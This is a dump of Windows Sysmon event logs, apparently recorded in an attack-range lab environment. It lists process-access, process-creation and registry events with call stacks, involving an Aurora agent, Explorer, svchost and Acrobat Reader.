Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018681Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.584{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018680Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.573{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018679Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.560{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018678Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.551{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018677Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.543{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 23542300x800000000000000018676Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.470{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2C8D17315F5C3B2F77E926871A8EA31,SHA256=10298AD7D940E7319CFAAFB6EF86D48D84060625D1EB88DB63E7AA58D81BB1C2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000046585Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.817{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b9b44|C:\Windows\System32\TwinUI.dll+ba1f7|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+61e4f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000046584Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.817{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b9b44|C:\Windows\System32\TwinUI.dll+ba1f7|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+61e4f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000046583Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.801{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046582Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.801{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046581Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.801{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000046580Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDBSetValue2023-01-18 12:30:02.801{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeBinary Data 10341000x800000000000000046579Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.801{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002012C:\Windows\Explorer.EXE{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+1088a6|C:\Windows\System32\TwinUI.dll+82197|C:\Windows\System32\TwinUI.dll+be23e|C:\Windows\System32\TwinUI.dll+be209|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046578Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.801{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002012C:\Windows\Explorer.EXE{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+1088a6|C:\Windows\System32\TwinUI.dll+82197|C:\Windows\System32\TwinUI.dll+be23e|C:\Windows\System32\TwinUI.dll+be209|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046577Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.786{FE4C2B44-D9F5-63C7-1200-00000000AF02}7561168C:\Windows\System32\svchost.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046576Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.786{FE4C2B44-D9F5-63C7-1200-00000000AF02}7561168C:\Windows\System32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046575Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.786{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000046574Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.645{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046573Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.645{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046572Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.645{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046571Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.645{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046570Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.645{FE4C2B44-DDF9-63C7-C404-00000000AF02}52004076C:\Windows\Explorer.EXE{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Windows\System32\windows.storage.dll+16bb3f|C:\Windows\System32\windows.storage.dll+16b7b5|C:\Windows\System32\windows.storage.dll+16b2a6|C:\Windows\System32\windows.storage.dll+16c718|C:\Windows\System32\windows.storage.dll+16b0ce|C:\Windows\System32\windows.storage.dll+16dc6d|C:\Windows\System32\windows.storage.dll+16e3ac|C:\Windows\System32\windows.storage.dll+16d710|C:\Windows\System32\windows.storage.dll+16fcea|C:\Windows\System32\windows.storage.dll+16faa6|C:\Windows\System32\SHELL32.dll+5c3dd|C:\Windows\System32\SHELL32.dll+5b256|C:\Windows\System32\SHELL32.dll+4d869|C:\Windows\System32\SHELL32.dll+8f0be|C:\Windows\System32\windows.storage.dll+fa4e|C:\Windows\System32\windows.storage.dll+fc51|C:\Windows\System32\windows.storage.dll+f88f|C:\Windows\System32\SHELL32.dll+4d8ef|C:\Windows\System32\SHELL32.dll+8f0be|C:\Windows\System32\SHELL32.dll+1774bb 154100x800000000000000046569Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.628{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe22.3.20310.0Adobe Acrobat Reader Adobe Acrobat ReaderAdobe Systems IncorporatedAcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" C:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2HighMD5=0A5C0CCFC753E1C0EA245C07D8639B5A,SHA256=1F58EFB0B672C63E78AC9A4D4E9035E32794498A0260AD5335A62B941080502F,IMPHASH=6A9AC92A0D0694C486D209A4166E7861{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\explorer.exe"C:\Windows\Explorer.EXE" /NOUACCHECK 10341000x800000000000000046568Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.598{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046567Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.598{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046566Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 